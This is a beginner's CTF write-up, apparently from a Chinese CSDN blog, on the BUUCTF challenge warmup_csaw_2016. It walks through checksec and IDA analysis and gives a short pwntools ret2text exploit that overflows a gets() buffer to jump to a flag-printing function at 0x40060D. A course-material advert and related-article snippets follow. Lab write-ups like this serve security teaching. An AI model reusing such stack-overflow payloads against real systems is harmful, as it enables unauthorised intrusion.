BUUCTF-warmup_csaw_2016 (新手pwner的成长日记3)(3)

最新推荐文章于 2024-05-13 22:55:07 发布
最新推荐文章于 2024-05-13 22:55:07 发布
阅读量303 收藏 7
点赞数 4
分类专栏: 程序员 文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84968612/article/details/138748629
版权

1.checksec一下

2.ida分析一下

​二、构造exp

1.exp代码展示

2.运行结果

三、小结一下

一、基本思路

1.checksec一下

还是一道没有开启任何保护的题目,暂且归类为简单题

2.ida分析一下

我们看到主函数朴实无华地给出了危险函数gets(),同时还有主函数直接returngets的内容,这里思路就到达ret2text的线上

然后我们再翻一翻,找一找,有个sub_40060D的函数,进去一看,不得了不得了,我们的payload直接利用sub_40060D函数就行了,甚至不需要获取shell权限,地址在反编译之前可以在函数末尾看见的,就不做展示了

二、构造exp

1.exp代码展示

#!/usr/bin/python3              ##这个是我使用虚拟机里面python的地址,大家自行调整
 
from pwn import*
 
io=remote("node5.buuoj.cn",端口)
payload=b'a'*(4*16+8)+p64(0x40060D)
io.sendline(payload)
io.interactive()

解释一下这里填充数据为什么是4*16,我们在ida里面双击v5这个字符进入栈区一看,它是在s的基础上,从0到40的var_40占用的是4*16个字节的空间,+8是因为64位文件的rbp需要填充

最后

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

img

img

img

img

img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

et/topics/618653875)

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

2401_84968612
关注
  • 4
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
0ctf_2016_warmup
05-17
2016年0ctf的pwn题。
Pi-Pwner:用于Raspbian Stretch的Pentesting Suite Deployer
05-12
Pi-Pwner是一个bash脚本,它将在运行Raspbian Stretch的Raspberry Pi上加载全面的测试工具和脚本套件。 在部署结束时,您将拥有一组工具,这些工具将在渗透测试参与期间提供帮助,以执行信息收集,嗅探,欺骗,无线...
warmup_csaw_2016
weixin_56301399的博客
07-20 1333
做了几道入门的题,从原来的柔弱蚂蚁到现在稍稍强壮的蚂蚁,我决定实施菜狗子计划,让蚂蚁继续进化。题目中的思路很清晰,对于栈溢出,我们先判断是否有栈溢出的漏洞,之后去找系统调用的函数,然后查到他的地址,最后就是我们的代码构建了。偏移量的计算=(数组本身大小+对应位的偏移64位是ox8)然后加上我们系统调用函数的地址。...
buuctf [HCTF 2018]WarmUp 1 解题思路
最新发布
2301_76899943的博客
05-13 398
flag.php,先检测flag.php能否包含,不能就包含…/flag.php,以此类推。,就在参数page的末尾加上?substr函数的意思就是截取字符串,截取从第0个字符串开始 长度为strpod函数给出的数字 的字符串。检查源代码可以看到有source.php的提示,那么直接打开source.php。这里要注意这个include函数,如果文件无法读取,会向后读取文件。只允许包含白名单的文件,有source.php和hint.php。(实力较弱,如有表述错误的,恳请大佬指点~~!
BUUCTF web之WarmUp 源代码详解
good good study
11-18 2366
前言前言访问除了一张滑稽图,就没其他的了查看源码,有一个注释了的 source.php,可以尝试直接访问一下。同时进行目录扫描访问source.php,里面包含php代码,题目说了是php代码审计,那就先从这里进行分析提取其中的php代码代码分析1. 代码整体结构分析前面两个条件很好满足,只需要 source.php?file=字符串 ,即可。所以重点需要让checkeFile函数返回true,则会进行文件包含2. chechkFile()函数分析。
BUUCTF-WarmUp
硫酸超的博客
11-20 5102
BUUCTF-WarmUp(代码审计) 1、打开靶场后,查看源码即可看到 <!--source.php--> 2、进入sourcep.php 代码如下 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.ph
BUUCTF PWN warmup_csaw_2016
Rt1Text的博客
04-22 398
1.checksec+运行 64位/没有保护 2.64位IDA进行 1.main 函数 明显的溢出函数gets() 跟进v5看看 offset = 0x40+8 shift+f12 真不错,cat flag.txt 找它的地址 3.上脚本 from pwn import* #p=process('./3warmup') p=remote("node4.buuoj.cn",28180) flag_addr=0x400611 payload=b'a'*(0...
IE10_11无法启动V2.04.1
01-22
IE10_11无法启动V2.04.1,帮你一键解决IE10和IE11无法启动的问题
Flash插件修复工具Win8.1_10 V2.34.1
01-22
Flash插件修复工具Win8.1_10 V2.34.1,一键修复Flash插件的各种问题。
jdk-8u221-windows-x64.exe(含有md5校验确保安装成功).7z
09-12
Java开发工具包(Java Development Kit,简称JDK)是Oracle公司发布的用于开发和运行Java程序的软件工具包。本主题涉及的是JDK的8u221版本,专为Windows 64位操作系统设计,即x64架构。这个特定的安装包文件名为"jdk...
OneDrive卸载工具
01-06
3. **安全无害**:作为官方提供的卸载工具,它不会对系统其他部分造成影响,可以放心使用。 4. **节省时间**:相比于手动查找和删除OneDrive的各个部分,这个工具能快速完成卸载过程,节省用户时间。 5. **防止...
buuctf warmup_csaw_2016
yidalipao1的博客
09-03 464
buuctf pwn
PWN学习记录(3)BUUCTF-warmup_csaw_2016
m0_58824086的博客
08-01 384
由**char v5[64]**可得,在main函数的栈帧中,划分了一个64字节的存储空间,也就是说只需要存入64个字节地址,就可以get函数返回地址。下载题目得到 warmup_csaw_2016,利用 file 命令查看该文件的类型,再通过checksec ./filename查看保护机制。将warmup_csaw_2016文件放入IDA中查看,打开字符串窗口。可得该文件是64位且该题任何保护都没有打开,所以我们可以实现最简单的栈溢出。将exp文件输入进1.py中,Esc+:wq保存并退出1.py。
BUUCTF web题目 之WarmUp
m0_54993799的博客
12-10 950
BUUCTF web题目之WarmUp
warmup_csaw_2016解题思路及步骤
2301_81504456的博客
02-29 381
合理选取返回地址,在字符串窗口中寻找有用数据信息。
buuctf web warmup详细题解
weixin_64160292的博客
03-31 3085
题目:warmup 题目来源:buuctf 分析过程: 1. 首先ctrl + u 查看源代码,我们发现有一个source.php文件 2. 我们打开source.php文件,是一段代码,这道题要我们代码审计。 3. 与source文件相似的hint.php文件我们也打开看一下,它说flag在ffffllllaaaagggg中。 正在上传… 4. 然后回来source.php看这段代码,通过上网查询关于php的函数的用法。然后审计代码得出,...
BUUCTF——Warmup
weixin_44866139的博客
04-30 1319
Warmup <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint....
buuctfwarmup_csaw_2016
weixin_54452942的博客
03-25 361
发现了一个gets函数可以溢出,并且在上面的运行中,我们看到他输出了一个地址,在下面的sprintf函数中将一个函数的地址输出了,我们去看看这个函数是干什么的。一种是ida直接看(不一定准),40h是64字节,再加8字节的rbp就是ret的位置。这里的返回地址,也就是rbp下面的地址是df28,我们输入的‘aaaaa’在dee0。是一个没有保护机制的64位x86架构的小端可执行程序。断在main函数地址,或者调用gets函数的地址也行。减一下刚好和ida中的一样。两种方式获得填充数据大小。
CTF buuoj pwn-----第3题:warmup_csaw_2016
bing_Max的博客
08-29 1677
CTF buuoj pwn-----第3题:warmup_csaw_2016前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技
BUUCTF-warmup_csaw_2016新手pwner成长日记3)
weixin_58410275的博客
04-23 1000
解释一下这里填充数据为什么是4*16,我们在ida里面双击v5这个字符进入栈区一看,它是在s的基础上,从0到40的var_40占用的是4*16个字节的空间,+8是因为64位文件的rbp需要填充。的函数,进去一看,不得了不得了,我们的payload直接利用sub_40060D函数就行了,甚至不需要获取shell权限,地址在反编译之前可以在函数末尾看见的,就不做展示了。由于文件的漏洞函数直接打开了flag文件,所以我们直接得到了flag的交互。然后我们再翻一翻,找一找,有个。gets的内容,这里思路就到达。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值